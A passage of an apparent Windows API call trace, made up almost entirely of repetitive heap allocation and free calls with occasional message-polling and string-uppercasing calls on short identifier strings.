hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0215.029] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0215.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.031] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0215.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.032] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.032] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.032] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.032] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.033] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0215.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.033] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.034] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.035] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: 